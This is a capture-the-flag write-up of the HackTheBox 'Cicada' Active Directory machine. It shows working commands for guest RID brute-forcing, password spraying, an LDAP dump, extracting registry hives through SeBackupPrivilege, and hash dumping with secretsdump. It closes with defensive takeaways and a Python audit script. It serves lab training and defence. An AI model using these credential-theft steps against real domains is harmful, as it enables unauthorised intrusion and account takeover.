Overview

Field        Detail
Name         Cicada
OS           Windows Server (Active Directory)
Difficulty   Easy
Platform     HackTheBox
Topics       AD Enumeration, SeBackupPrivilege, Password Spraying

Reconnaissance

Service Scan

An Nmap full-port scan reveals a standard Windows Active Directory domain controller. Nothing unusual stands out beyond the expected AD service stack.

PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP
                             (Domain: cicada.htb, Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: DNS:CICADA-DC.cicada.htb
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP
                             (Domain: cicada.htb, Site: Default-First-Site-Name)

Note: Add the following entries to /etc/hosts before proceeding:

<TARGET_IP>  cicada.htb  CICADA-DC.cicada.htb  CICADA-DC

Enumeration

SMB — Guest Session

Null authentication fails, but a guest login succeeds and exposes a share named HR. Inside this share, an HR notice document contains a default password intended for new employees.

RID Brute-Force — User Enumeration

Using the guest account, brute-force the RID range to enumerate all domain users:

nxc smb <TARGET_IP> -u guest -p '' --rid-brute

Parse the output to extract a clean user list and save it as users.list.

Password Spraying

Spray the default password found in the HR notice against the enumerated user list:

nxc smb <TARGET_IP> -u users.list -p 'Cicada$M6Corpb*@Lp#nZp!8' --continue-on-success

One account, michael.wrightson, authenticates successfully with the default credentials. On its own, however, this account has minimal privileges.

LDAP Dump — Credential Discovery

Using the compromised account, perform a full LDAP dump with ldapdomaindump:

ldapdomaindump ldap://<TARGET_IP> \
  -u 'michael.wrightson' \
  -p 'Cicada$M6Corpb*@Lp#nZp!8' \
  -o lootme

Reviewing the dumped domain objects reveals that david.orelious has stored his password in plaintext within his AD account description field — a common misconfiguration.

SMB Share Enumeration — DEV

Authenticating as david.orelious, the DEV share becomes accessible. It contains a PowerShell backup script:

DEV\Backup_script.ps1

Inspecting the script reveals hardcoded credentials for emily.oscars, who has WinRM access to the domain controller.

Foothold

Authenticate to the DC via WinRM using Emily’s credentials:

evil-winrm -i <TARGET_IP> -u emily.oscars -p '<PASSWORD>'

Privilege Escalation

SeBackupPrivilege Abuse

Checking Emily’s token privileges reveals that SeBackupPrivilege is enabled. The privilege exists for backup software: a process holding it can open any file on the system for reading with backup semantics, regardless of the file’s ACL.

whoami /priv

Extracting Registry Hives

Use reg save to back up the SAM, SYSTEM, and SECURITY hives:

reg save hklm\sam      C:\Temp\sam.save
reg save hklm\system   C:\Temp\system.save
reg save hklm\security C:\Temp\security.save

Transfer the saved hive files to your attacking machine.

Dumping Hashes

Use Impacket’s secretsdump.py to extract NTLM hashes from the hive files offline:

secretsdump.py -sam sam.save -system system.save local

Output:

Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies

[*] Target system bootKey: 0x3c2b033757a49110a9ee680b46e8d620
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:2b87e7c93a3e8a0ea4a581937016f341:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] Cleaning up...

The Administrator NTLM hash is recovered. Pass-the-hash to authenticate as Administrator and complete the domain compromise.

Attack Chain Summary

flowchart TD
    A([🔍 Nmap Scan]) --> B[SMB Guest Login]
    B --> C[HR Share]
    C --> D[Default Password Discovered]
    D --> E[RID Brute-Force]
    E --> F[User List]
    F & D --> G[Password Spraying]
    G --> H[michael.wrightson ✓]
    H --> I[LDAP Dump via ldapdomaindump]
    I --> J[david.orelious\nPassword in Description]
    J --> K[DEV Share Access]
    K --> L[Backup_script.ps1]
    L --> M[emily.oscars Credentials]
    M --> N[WinRM Foothold]
    N --> O{SeBackupPrivilege}
    O --> P[reg save SAM + SYSTEM]
    P --> Q[secretsdump.py offline]
    Q --> R([💀 Administrator Hash])

Key Takeaways

  • Default credentials distributed via internal shares are a critical risk — they should be rotated immediately upon first login.
  • Passwords in AD description fields are a well-known but still common misconfiguration. Audit regularly with Get-ADUser -Filter * -Properties Description.
  • SeBackupPrivilege is effectively equivalent to local administrator; it should never be granted to non-administrative accounts.
  • Hardcoded credentials in scripts present a significant lateral movement risk, even when stored on internal network shares.
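The description-field audit from the takeaways, combined with a check for Backup Operators membership (the usual source of SeBackupPrivilege on non-admin accounts), as an added Python example that is not part of the original writeup. It assumes the list-of-records layout ldapdomaindump writes to domain_users.json (a dn plus an attributes dict whose values are lists) and runs on a constructed sample embedded inline; the account names and descriptions in the sample are made up.

```python
import json
import re

# Constructed sample in the assumed shape of ldapdomaindump's domain_users.json.
# Every name and description here is invented for this example.
SAMPLE_USERS_JSON = json.dumps([
    {"dn": "CN=Alice Example,CN=Users,DC=cicada,DC=htb",
     "attributes": {"sAMAccountName": ["alice.example"],
                    "description": ["Finance team lead"],
                    "memberOf": ["CN=Finance,CN=Users,DC=cicada,DC=htb"]}},
    {"dn": "CN=Bob Example,CN=Users,DC=cicada,DC=htb",
     "attributes": {"sAMAccountName": ["bob.example"],
                    "description": ["Just in case I forget my password is Sup3rS3cr3t!"],
                    "memberOf": []}},
    {"dn": "CN=Carol Example,CN=Users,DC=cicada,DC=htb",
     "attributes": {"sAMAccountName": ["carol.example"],
                    "description": ["Helpdesk contractor"],
                    "memberOf": ["CN=Backup Operators,CN=Builtin,DC=cicada,DC=htb"]}},
])

# Words that usually accompany a credential left in a free-text field
PASSWORD_HINT = re.compile(r"\b(pass(word|wd)?|pwd|cred|secret|pin)\b", re.I)
# Cheap entropy proxy: one token of 8+ chars mixing letters, digits and symbols
TOKEN_LIKE = re.compile(r"(?=\S*\d)(?=\S*[A-Za-z])(?=\S*[^\w\s])\S{8,}")


def audit_users(users_json):
    """Return (account, finding, evidence) tuples for the two misconfigurations."""
    findings = []
    for entry in json.loads(users_json):
        attrs = entry.get("attributes", {})
        sam = (attrs.get("sAMAccountName") or ["?"])[0]
        for desc in attrs.get("description") or []:
            if PASSWORD_HINT.search(desc) or TOKEN_LIKE.search(desc):
                findings.append((sam, "description-looks-like-credential", desc))
        for group in attrs.get("memberOf") or []:
            # Backup Operators grants SeBackupPrivilege, which reads any file
            if group.lower().startswith("cn=backup operators,"):
                findings.append((sam, "backup-operators-member", group))
    return findings


if __name__ == "__main__":
    for account, finding, evidence in audit_users(SAMPLE_USERS_JSON):
        print(f"{account}: {finding} -> {evidence}")
```

Point it at the real domain_users.json from the lootme directory to run the same check against a live dump.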